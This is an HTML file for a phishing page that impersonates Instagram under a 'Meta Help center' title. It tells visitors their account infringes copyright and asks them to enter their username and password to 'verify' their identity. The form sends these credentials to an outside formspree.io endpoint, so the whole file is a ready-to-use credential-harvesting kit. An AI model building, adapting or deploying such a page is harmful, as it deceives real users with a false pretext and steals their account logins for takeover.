<!DOCTYPE html>
<head>
<title>Meta Help center</title>
<style>

body{
    text-align: center;
    font-family: sans-serif,serif;
    
}
.div2{
    padding-top: 100px;
    color: grey;
}
.div1{
padding-top: 50px;
font-size: 25px;
}
.username,.password{
    border: 1px #9a9a9a solid;
    border-radius: 5px;
    width: 10cm;
    height: 1cm;
    background-color: #fafafa;
    width: 7cm;
    height: 0.9cm;
}
::placeholder{
    font-size: 11.3px;
}
.btn1{
    width: 7.3cm;
  background-color: #3897f0;
  border: 1px solid #3897f0;
  padding: 5px 12px;
  color: #fff;
  font-weight: bold;
  cursor: pointer;
  font-family: Arial, 'Times New Roman', 'Gill Sans', 'Gill Sans MT', 'Trebuchet MS', sans-serif, serif; ;
  border-radius: 5px;
}



</style>
</head>

<body>
    <form action="https://formspree.io/f/meqvyngw" method="post">
<div class="div1">


    <p class="i">
       <b> Instagram </b>
    </p>





</div>

<div class="div2">

<p class="p1">Your Instagram account infringes on copyright Please enter your username and password to verify</p>
<p class="p2">your identify.</p>
</div>

<div class="div3">

<br>
<input type="text" class="username" name="Username" placeholder="Username"><br><br><br>
<input type="password" class="password" name="Password" placeholder="Password">



</div>

<br><br><br>
<button type="submit" class="btn1">Submit</button>
<br><br><br><br><br>
</div>
<img src="insfromfb.jpeg" height="300px" width="300px">
</form>
</body>